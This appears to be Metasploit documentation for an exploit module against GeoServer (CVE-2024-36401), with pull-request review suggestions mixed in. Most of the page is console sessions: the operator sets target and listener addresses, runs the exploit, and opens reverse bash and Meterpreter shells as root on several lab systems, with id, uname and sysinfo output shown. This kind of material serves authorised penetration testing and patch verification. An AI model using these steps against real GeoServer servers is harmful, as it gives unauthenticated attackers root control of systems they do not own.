GeoServer unauthenticated RCE [CVE-2024-36401] (#19311)
rapid7/metasploit-framework: documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md

  through specially crafted input against a default GeoServer installation due to unsafely
  evaluating property names as XPath expressions.
  An attacker can abuse this by sending a POST request with a malicious xpath expression
  to execute arbitrary commands as root on the system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-36401
  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
  https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
  https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401

View the full module info with the info -d command.
```
###  GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set rhosts 192.168.201.86
rhosts => 192.168.201.86
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.23.5

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.23.5
```

[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cuckoo 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
pwd
/usr/share/geoserver
exit
```
###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.23.5

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.23.5
```

[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-11) aarch64 GNU/Linux
pwd
/usr/share/geoserver
exit
```
###  GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.42
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.23.2

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.23.2
```

[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux e3f986905bde 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 GNU/Linux
pwd
/mnt/geoserver
```
###  GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set srvport 1981
srvport => 1981
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.23.2

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.23.2
```

[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
[*] Sending payload to 192.168.201.42 (curl/7.74.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.42:60353) at 2024-07-11 18:48:02 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : Debian 11.3 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/mnt/geoserver
meterpreter >
```
###  GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.25.0

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.25.0
```

[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:61350) at 2024-07-11 20:46:14 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 22.04 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/opt
meterpreter >
```
###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp
```msf
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.23.5

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.23.5
```

[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/usr/share/geoserver
meterpreter >
```
### GeoServer 2.25.0 on x64 Windows 10 (10.0 Build 19045)
```
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 2
target => 2
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.

> [+] The target is vulnerable. Version 2.25.0

Reviewer: ```suggestion
[+] The target appears to be vulnerable. Version 2.25.0
```
